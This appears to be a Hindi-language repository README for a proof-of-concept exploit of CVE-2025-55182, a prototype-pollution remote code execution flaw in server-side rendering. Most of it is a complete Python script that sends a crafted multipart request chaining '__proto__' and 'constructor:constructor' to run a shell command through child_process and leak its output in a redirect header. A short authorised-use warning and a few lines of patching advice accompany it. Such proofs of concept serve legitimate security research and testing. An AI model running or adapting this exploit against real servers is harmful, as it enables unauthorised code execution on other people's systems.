
CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो सर्वर-साइड रेंडरिंग इम्प्लीमेंटेशन में प्रोटोटाइप प्रदूषण के माध्यम से रिमोट कोड एक्जीक्यूशन को प्रदर्शित करता है। इसमें पायथन एक्सप्लॉइट स्क्रिप्ट और सुरक्षा अनुशंसाएँ शामिल हैं।
इस रिपॉजिटरी में CVE-2025-55182 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शामिल है, जो कि कुछ सर्वर-साइड रेंडरिंग कार्यान्वयनों में प्रोटोटाइप प्रदूषण (Prototype Pollution) के कारण रिमोट कोड एक्जीक्यूशन (RCE) से संबंधित एक कमजोरी है।
⚠️ चेतावनी: यह PoC केवल शैक्षिक, अनुसंधान और व्यक्तिगत या नियंत्रित वातावरणों पर अधिकृत सुरक्षा परीक्षण के लिए है। बिना अनुमति के सिस्टम पर अनधिकृत उपयोग अवैध है।
यह कमजोरी तब उत्पन्न होती है जब अमान्यकृत उपयोगकर्ता इनपुट आंतरिक जावास्क्रिप्ट ऑब्जेक्ट संरचनाओं (प्रोटोटाइप प्रदूषण) में इंजेक्ट किया जाता है। जब इसे विशिष्ट निष्पादन प्रवाहों के साथ जोड़ा जाता है, तो यह मनमाना कोड निष्पादन का कारण बन सकता है।
इस PoC में, __proto__ और constructor जैसी श्रृंखलाबद्ध गुणों का उपयोग प्रदूषण को निष्पादन संदर्भ में बढ़ाने के लिए किया जाता है।
नीचे exploit.py दिया गया है जो दर्शाता है कि कमजोरी का शोषण कैसे किया जा सकता है:
import requests
import json
url = "http://localhost:3000"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
"Next-Action": "x",
}
prefix = "var res=process.mainModule.require('child_process').execSync('id').toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});"
files = {
"0": (
None,
json.dumps({
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": '{"then":"$B1337"}',
"_response": {
"_prefix": prefix,
"_formData": {"get": "$1:constructor:constructor"}
}
}),
"application/json",
),
"1": (None, "\"$@0\""),
}
response = requests.post(url, headers=headers, files=files)
print("Headers:", response.headers.get('x-action-redirect'))
python3 exploit.py
सुनिश्चित करें कि आप इसे केवल स्थानीय या डेवलपमेंट वातावरण में चलाएँ।
यदि यह कमजोरी किसी वास्तविक-दुनिया के प्रोजेक्ट को प्रभावित करती है, तो मेंटेनर्स द्वारा जारी नवीनतम सुरक्षा पैच की जाँच करें और उन्हें स्थापित करें।
child_process निष्पादन को प्रतिबंधित या अक्षम करेंMIT लाइसेंस